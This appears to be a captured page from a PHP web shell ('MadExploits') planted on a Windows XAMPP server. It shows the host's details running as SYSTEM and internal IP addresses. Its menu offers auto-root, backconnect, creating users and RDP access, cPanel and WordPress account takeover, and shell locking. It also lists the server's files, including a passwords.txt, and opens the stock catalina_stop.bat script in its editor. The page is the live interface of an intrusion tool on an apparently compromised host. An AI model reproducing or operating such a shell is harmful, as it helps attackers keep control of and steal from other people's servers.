Windows NT DGPENSV2LPKMN 10.0 build 14393 (Windows Server 2016) AMD64
Apache/2.4.46 (Win64) OpenSSL/1.1.1h PHP/7.3.25
: 172.16.0.66 | : 172.16.0.254
Cant Read [ /etc/named.conf ]
7.3.25
SYSTEM
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
[ A ]
[ C ]
[ D ]
C: /
xampp7 /
[ HOME SHELL ]
Name
Size
Permission
Action
FileZillaFTP
[ DIR ]
drwxrwxrwx
MercuryMail
[ DIR ]
drwxrwxrwx
anonymous
[ DIR ]
drwxrwxrwx
apache
[ DIR ]
drwxrwxrwx
cgi-bin
[ DIR ]
drwxrwxrwx
contrib
[ DIR ]
drwxrwxrwx
htdocs
[ DIR ]
drwxrwxrwx
img
[ DIR ]
drwxrwxrwx
install
[ DIR ]
drwxrwxrwx
licenses
[ DIR ]
drwxrwxrwx
locale
[ DIR ]
drwxrwxrwx
mailoutput
[ DIR ]
drwxrwxrwx
mailtodisk
[ DIR ]
drwxrwxrwx
mysql
[ DIR ]
drwxrwxrwx
perl
[ DIR ]
drwxrwxrwx
php
[ DIR ]
drwxrwxrwx
phpMyAdmin
[ DIR ]
drwxrwxrwx
sendmail
[ DIR ]
drwxrwxrwx
src
[ DIR ]
drwxrwxrwx
tmp
[ DIR ]
drwxrwxrwx
tomcat
[ DIR ]
drwxrwxrwx
webalizer
[ DIR ]
drwxrwxrwx
webdav
[ DIR ]
drwxrwxrwx
apache_start.bat
436
B
-rwxrwxrwx
apache_stop.bat
177
B
-rwxrwxrwx
bak
0
B
-rw-rw-rw-
catalina_service.bat
9.22
KB
-rwxrwxrwx
catalina_start.bat
4.37
KB
-rwxrwxrwx
catalina_stop.bat
4.08
KB
-rwxrwxrwx
ctlscript.bat
2.71
KB
-rwxrwxrwx
filezilla_setup.bat
78
B
-rwxrwxrwx
filezilla_start.bat
150
B
-rwxrwxrwx
filezilla_stop.bat
149
B
-rwxrwxrwx
killprocess.bat
299
B
-rwxrwxrwx
mercury_start.bat
136
B
-rwxrwxrwx
mercury_stop.bat
60
B
-rwxrwxrwx
mysql_start.bat
471
B
-rwxrwxrwx
mysql_stop.bat
257
B
-rwxrwxrwx
passwords.txt
824
B
-rw-rw-rw-
properties.ini
802
B
-rw-rw-rw-
readme_de.txt
7.32
KB
-rw-rw-rw-
readme_en.txt
7.2
KB
-rw-rw-rw-
service.exe
59.5
KB
-rwxrwxrwx
setup_xampp.bat
1.23
KB
-rwxrwxrwx
test_php.bat
2
KB
-rwxrwxrwx
uninstall.dat
248
KB
-rw-rw-rw-
uninstall.exe
11.93
MB
-rwxrwxrwx
xampp-control.exe
3.21
MB
-rwxrwxrwx
xampp-control.ini
1.17
KB
-rw-rw-rw-
xampp-control.log
16.82
KB
-rw-rw-rw-
xampp_shell.bat
1.06
KB
-rwxrwxrwx
xampp_start.exe
116
KB
-rwxrwxrwx
xampp_stop.exe
116
KB
-rwxrwxrwx
Delete
Unzip
Zip
${this.title}
Close
Code Editor : catalina_stop.bat
@echo off SetLocal EnableDelayedExpansion cd /D %~dp0 :::::::::::::::::::::::::::::::::::: :: Set JAVA_HOME or JRE_HOME :: :::::::::::::::::::::::::::::::::::: title %~0 echo. echo [XAMPP]: Searching for JDK or JRE HOME with reg query ... set JDKKeyName64=HKEY_LOCAL_MACHINE\SOFTWARE\JavaSoft\Java Development Kit set JDKKeyName64Short=HKEY_LOCAL_MACHINE\SOFTWARE\JavaSoft\JDK set JDKKeyName32=HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\JavaSoft\Java Development Kit set AdoptOpenJDKKeyName64=HKEY_LOCAL_MACHINE\SOFTWARE\AdoptOpenJDK\JDK set JREKeyName64=HKEY_LOCAL_MACHINE\SOFTWARE\JavaSoft\Java Runtime Environment set JREKeyName64Short=HKEY_LOCAL_MACHINE\SOFTWARE\JavaSoft\JRE set AdoptOpenJDKKeyName64JRE=HKEY_LOCAL_MACHINE\SOFTWARE\AdoptOpenJDK\JRE set JREKeyName32=HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\JavaSoft\Java Runtime Environment reg query "%JDKKeyName64%" /s if %ERRORLEVEL% EQU 1 ( echo . [XAMPP]: Could not find 32 bit or 64 bit JDK echo . [XAMPP]: Looking for 32 bit JDK on 64 bit machine goto FINDJDK64SHORT ) set KeyName=%JDKKeyName64% goto JDKRUN :FINDJDK64SHORT reg query "%JDKKeyName64Short%" /s if %ERRORLEVEL% EQU 1 ( echo . [XAMPP]: Could not find 32 bit JDK echo . [XAMPP]: Looking for 32 bit or 64 bit on 64 bit machine with short name goto FINDJDK32 ) set KeyName=%JDKKeyName32% goto JDKRUN :FINDJDK32 reg query "%JDKKeyName32%" /s if %ERRORLEVEL% EQU 1 ( echo . [XAMPP]: Could not find 32 bit JDK echo . [XAMPP]: Looking for 32 bit or 64 bit AdoptOpenJDK on 64 bit machine goto FINDADOPTOPENJDK64 ) set KeyName=%JDKKeyName32% goto JDKRUN :FINDADOPTOPENJDK64 reg query "%AdoptOpenJDKKeyName64%" /s if %ERRORLEVEL% EQU 1 ( echo . [XAMPP]: Could not find 32 bit or 64 bit AdoptOpenJDK echo . [XAMPP]: Looking for 32 bit or 64 bit JRE goto FINDJRE64 ) set KeyName=%AdoptOpenJDKKeyName64% goto JDKRUN :FINDJRE64 reg query "%JREKeyName64%" /s if %ERRORLEVEL% EQU 1 ( echo . [XAMPP]: Could not find 32 bit or 64 bit JRE with long name echo . [XAMPP]: Looking for 32 bit or 64 bit JRE on 64 bit machine with short name goto FINDJRE64SHORT ) set KeyName=%JREKeyName64% goto JRERUN :FINDJRE64SHORT reg query "%JREKeyName64Short%" /s if %ERRORLEVEL% EQU 1 ( echo . [XAMPP]: Could not find 32 bit or 64 bit JRE with short name echo . [XAMPP]: Looking for 32 bit JRE on 64 bit machine goto FINDJRE32 ) set KeyName=%JREKeyName64Short% goto JRERUN :FINDADOPTOPENJDK64JRE reg query "%AdoptOpenJDKKeyName64JRE%" /s if %ERRORLEVEL% EQU 1 ( echo . [XAMPP]: Could not find 32 bit or 64 bit AdoptOpenJDK JRE echo . [XAMPP]: Looking for 32 JRE on 64 bit machine goto FINDJRE32 ) set KeyName=%AdoptOpenJDKKeyName64JRE% goto JDKRUN :FINDJRE32 reg query "%JREKeyName32%" /s if %ERRORLEVEL% EQU 1 ( echo . [XAMPP]: Could not find 32 bit JRE echo . [XAMPP]: Could not set JAVA_HOME or JRE_HOME. Aborting goto ENDERROR ) set KeyName=%JREKeyName32% goto JRERUN :JDKRUN echo. echo [XAMPP]: Using JDK set "CURRENT_DIR=%cd%" set "CATALINA_HOME=%CURRENT_DIR%\tomcat" if NOT DEFINED JAVA_HOME ( set Cmd=reg query "!KeyName!" /s for /f "tokens=2*" %%i in ('!Cmd! ^| find "JavaHome"') do set JAVA_HOME=%%j ) echo. echo [XAMPP]: Seems fine! echo [XAMPP]: Set JAVA_HOME : %JAVA_HOME% echo [XAMPP]: Set CATALINA_HOME : %CATALINA_HOME% echo. if %ERRORLEVEL% == 0 ( del /F/Q tomcat\logs\catalina.pid ) "%CATALINA_HOME%\bin\catalina.bat" stop goto END :JRERUN echo. echo [XAMPP]: Using JRE set "CURRENT_DIR=%cd%" set "CATALINA_HOME=%CURRENT_DIR%\tomcat" if NOT DEFINED JRE_HOME ( set Cmd=reg query "!KeyName!" /s for /f "tokens=2*" %%i in ('!Cmd! ^| find "JavaHome"') do set JRE_HOME=%%j ) echo. echo [XAMPP]: Seems fine! echo [XAMPP]: Set JRE_HOME : %JRE_HOME% echo [XAMPP]: Set CATALINA_HOME : %CATALINA_HOME% echo. if %ERRORLEVEL% == 0 ( del /F/Q tomcat\logs\catalina.pid ) "%CATALINA_HOME%\bin\catalina.bat" stop goto END :ENDERROR exit 1 :END echo done. SetLocal DisableDelayedExpansion
Close